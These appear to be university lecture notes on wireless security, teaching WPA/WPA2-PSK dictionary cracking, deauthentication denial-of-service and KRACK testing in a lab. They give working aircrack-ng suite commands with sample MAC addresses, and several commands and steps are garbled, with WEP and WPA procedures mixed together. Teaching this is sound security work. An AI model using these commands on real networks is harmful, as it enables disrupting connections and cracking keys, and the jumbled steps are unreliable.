Wireless Networks
Dr Ayman El Hajjar 2022-2023
WPA/WPA2
WPA (or WPA v1 as it is referred to sometimes) primarily uses the Temporal
Key Integrity Protocol (TKIP) encryption algorithm. TKIP was aimed at
improving WEP, without requiring completely new hardware to run it.
WPA2 in contrast mandatorily uses the AES-CCMP algorithm for encryption,
which is much more powerful and robust than TKIP.
Both WPA and WPA2 allow either EAP-based authentication, using RADIUS
servers (Enterprise) or a Pre-Shared Key (PSK) (personal)based
authentication schema.
WPA/WPA2 PSK is vulnerable to a dictionary attack. The inputs required for
this attack are the four-way WPA handshake between client and access point,
and a wordlist that contains common passphrases. Then, using tools such as
aircrack-ng, we can try to crack the WPA/ WPA2 PSK passphrase.
An illustration of the four-way handshake is shown in the following
screenshot:
The way WPA/WPA2 PSK works is that it derives the per-session key, called
the Pairwise Transient Key (PTK), using the PSK and five other
parameters—SSID of network, Authenticator Nonce (ANonce), Supplicant
Nonce (SNonce), Authenticator MAC address (access point MAC), and
Suppliant MAC address (Wi-Fi client MAC). This key is then used to encrypt
all data between the access point and client.
An attacker who is eavesdropping on this entire conversation by sniffing the
air can get all five parameters mentioned in the previous paragraph. The
only thing he does not have is the PSK. So, how is the PSK created? It is
derived by using the WPA-PSK passphrase supplied by the user, along with
the SSID. The combination of both of these is sent through the Password-
Based Key Derivation Function (PBKDF2), which outputs the 256-bit shared
key.
1
� In a typical WPA/WPA2 PSK dictionary attack, the attacker would use a large
dictionary of possible passphrases with the attack tool. The tool would
derive the 256-bit PSK from each of the passphrases and use it with the
other parameters, described earlier, to create the PTK. The PTK will be used
to verify the Message Integrity Check (MIC) in one of the handshake packets.
If it matches, then the guessed passphrase from the dictionary was correct;
if not, it was incorrect
Eventually, if the authorized network passphrase exists in the dictionary, it
will be identified. This is exactly how WPA/WPA2 PSK cracking works! The
following diagram illustrates the steps involved:
In the next section, we will take a look at how to crack a WPA PSK wireless
network. The exact same steps will be involved in cracking a WPA2-PSK network
using CCMP (AES) as well. cracking WPA-PSK weak passphrase
We start airodump-ng with the following command so that it starts
capturing and storing all packets for our network:
• In the reconnaissance phase, we have collected information about each network to be
tested, such as the BSSID, the channel on which it operates, and the security protocol used.
2
� Here, we focus on a WEP-protected network and we start capturing the frames exchanged
by the AP and the associated clients on the relative channel.
Capture traffic
Command
The two commands needs to be executed regardless whether a
client is connected or not.
• We first need to start our wireless network in monitor mode.
• We first need to identify which interface has wireless capabilities by typing iwconfig.
• On my computer, the device is called wlan0. On your computer the device can be
different
Command
sudoairmon-ngstartwlan0
• This will start your wireless network in monitor mode
• IfItype iwconfig I can see that I now have wlan0mon insteadof wlan0
• We can try this attack ourselves by setting our Wi-Fi router to use WEP. We assume that
the BSSID of the AP is 08:7A:4C:83:0C:E0 and the channel is 11. The first step is to start the
monitor mode on channel 11
Command
sudoairodump-ngwlan0mon
• This will start your dumpcontrol message straffic from surrounding wireless
Networks on your screen.
• This is actu ally only needed to identify the access point you want to at tack.
• To capture the traffic of our target network, we will execute the following command:
3
�Now, we can wait for a new client to connect to the access point so that we
can capture the four-way WPA handshake, or we can send a broadcast
deauthentication packet to force clients to reconnect. We do the latter to
speed things up. The same thing can happen again with the unknown
channel error. Again, use −−ignorenegative- one. This can also require more
than one attempt.
As soon as we capture a WPA handshake, the airodump-ng tool will indicate
it in the top-right corner of the screen with a WPA handshake followed by
the access point’s BSSID.
If you are using −−ignore-negative-one, the tool may replace the WPA
handshake with a fixed channel message. Just keep an eye out for a quick
4
� flash of a WPA handshake. If we check our working directory, we should see
that a .cap file has been generated.
We can stop the airodump-ng utility now. Let’s open up the capture file in
Wireshark and view the four-way handshake. The handshake packets are
the one whose protocol is EAPOL. You can filter this by typing eapol into the
filter bar.
Now, we will start the actual key cracking exercise! For this, we need the
dictionary of common words that you have downloaded in the pervious step
We will now invoke the aircrack-ng utility with the pcap file as the input and
a link to the dictionary file, as shown in the following screenshot. I have used
passwords. lst which i have installed on Desktop, as shown in the terminal
• We open a new tab in the terminal and run the following command:
– -b is the BSSID
– - h is the connected station MAC address -There can be several connected
stations to the access point. Choose the one that is generating more traffic
– -arpreplay (or -3) is the ARP Request Replay attack option
Command
sudo aireplay-ng −− arpreplay -h 98:52:B1:3B:32:58 -b
08:7A:4C:83:0C:E0 wlan0mon
• We switch to the terminal with the output of airodump-ng and we should notice that the
number of captured frames (number of Data packets) increases quickly
• After collecting a sufficient number of packets (that is, as we have seen, about 40,000 for
the PTW attack implemented by aircrack-ng), we can begin to try cracking the WEP key,
starting aircrack-ng in a new console tab.
• aircrack-ng is a tool that can recover the key from the frames saved in a .cap file, using the
PTW attack as the default method. We run the following command:
5
� Command
Sudo aircrack-ng WPACrackingDemo-01 -w
/home/qa-n05/Desktop/passwords.lst
The aircrack-ng utility uses the dictionary file to try various combinations of
passphrases and tries to crack the key. If the passphrase is present in the
dictionary file, it will eventually crack it.
Please note that, as this is a dictionary attack, the prerequisite is that the
passphrase must be present in the dictionary file you are supplying to
aircrack-ng. If the passphrase is not present in the dictionary, the attack will
fail!
DOS: Deauthentication attacks
Note
Forthisattack,wewillconfiguretheWirelessLabnetworktouseOpen
Authenticationandnoencryption.Thiswillallowustoseethepackets
usingWiresharkeasily.
Let’s connect a Windows client to the access point. We will see the
connection in the airodump-ng screen
Now, on the attacker machine, let’s run a directed deauthentication attack
against this
Command
sudoaireplay-ng-05-aE8:94:6:62:1E:8E-c
AC:5F:3E:B3:3A:B0 −− ignore-negative-onewlan0mon
Note how the client gets disconnected from the access point completely. We
can verify this on the airodump-ng screen as well
we use Wireshark to see the traffic, you will notice a lot of deauthentication
packets that we just sent over the air
We can do the same attack by sending a Broadcast deauthentication packet
on behalf of the access point to the entire wireless network. This will have
the effect of disconnecting all connected clients
6
� Command
sudoaireplay-ng-05-aE8:94:6:62:1E:8E
−− ignore-negative-onewlan0mon
We successfully sent deauthentication frames to both the access point and
the client. This resulted in them getting disconnected and a full loss of
communication between them.
We also sent out Broadcast deauthentication packets, which will ensure that
no client in the vicinity can successfully connect to our access point.
It is important to note that, as soon as the client is disconnected, it will try
to connect back once again to the access point, and thus the
deauthentication attack has to be carried out in a sustainable way to have a
full DoS effect.
This is one of the easiest attacks to orchestrate but has the most devastating
effect. This can easily be used in the real world to bring a wireless network
down on its knees.
DOS: disassociation attacks
Try to check how you can conduct disassociation attacks against the
infrastructure using tools available in Kali.
Can you do a will leave this for you broadcast disassociation
attack? I
Cracking WPA2 using KRACK attack
KRACK stands for Key Reinstallation AttaCKs. It’s a tranche of vulnerabilities
publicly disclosed in October 2017 by a team from KU Leuven. The attack is
the exploitation of a fundamental flaw in the WPA2 handshake, allowing
resending of a stage of the handshake in order to overwrite cryptographic
data. This chapter will cover the attack at a theoretical level and provide
some guidance on the successful identification and exploitation of this
vulnerability.
Keeping in mind what we just discussed, you may now be surprised to find
that this process is vulnerable to attack! However, the issue is not the core
concept, but the practical implementation of the standard. As with most
technical standards, sacrifices were made to the security of the solution in
order to make it user-friendly. In specific, the sacrifice that was made to
make the solution usable was making certain stages in the handshake
replayable in the event of a missed message.
7
�While this is not a huge issue for most of the process, Stage 3 is replayable
and can have a dramatic effect on the security of the overall solution. By
placing themselves in a Man-in-the-Middle (MITM) position during the
authentication process, an attacker can block the correctly negotiated PTK
and install their own in certain circumstances. The Key Replay Counter and
associated nonce values are reset when a key is negotiated. So by blocking
certain packets, an MITM attacker can predict what counter and nonce
values are going to be by forcing a key reinstall. This will enable future
attackers to perform malicious actions such as decryption, spoofing, and
packet replay.
Let us start by downloading KRrack exploit by typing git clone https://github.com/vanhoefm/krack
scripts
We will have to install the dependencies that the project relies upon. This
will be achieved with the following command: apt-get install libnl-3dev
libnl-genl-3-dev pkg-config libssl-dev net-tools git sysfsutils python-
scapy python-pycryptodome
Change into the created krackattacks-scripts directory and check the
contents. It should look like the following cd krackattacks-scripts
In this folder you can see the body of testing scripts and the solution Mathy
and the team have put together. Before we can start playing with them,
though, we need to compile hostapd in the format that they need.
The script itself provides these instructions on first use. However, I’ve
written them here for clarity.
Change into the hostapd directory and type cp defconfig .config
make -j 2
– This will have compiled hostapd for use in the KRACK attack PoC
scripts.
– now go back to the cd krackattacks-scripts folder
The scripts will recommend executing the disable-hwcrypto.sh script upon
first use. However, after using an Alfa AWUS051NH and a Kali Linux VM, I
found that this script would only crash the VM and the scripts worked
regardless. It is a user’s choice whether to carry this step out, but discretion
is advised.
There are three other important files in this directory. Firstly, hostapd.conf
defines the Wi-Fi details of the network to be generated. The defaults are
testnetwork as the SSID and abcdefgh as the passphrase. Feel free to change
these to your satisfaction.
8
�Second, the krack-test-client.py script is the script that we will be using to
identify vulnerable devices. This is the main focus of this chapter.
Finally, there is the krack-ft-test.py which we will not cover the usage of in
this chapter due to its application to niche wireless devices outside of the
standard distribution.
Next, we actually get KRACKing.
We will need to disable network manager to avoid conflicts using the
following commands:
systemctl stop NetworkManager.service and systemctl disable
NetworkManager.service
We can then execute the krack-test-client.py script with the following
command: python krack-test-client.py
Now get hold of a test device, any Wi-Fi-enabled device, and connect to the
created network with the credentials described earlier or whatever you’ve
set it to.
The terminal will fill with text, but the script will helpfully mark any
successful attacks in green showing it is succesful
The script will iterate through the potential attacks and inform the user
whether the device tested is vulnerable.
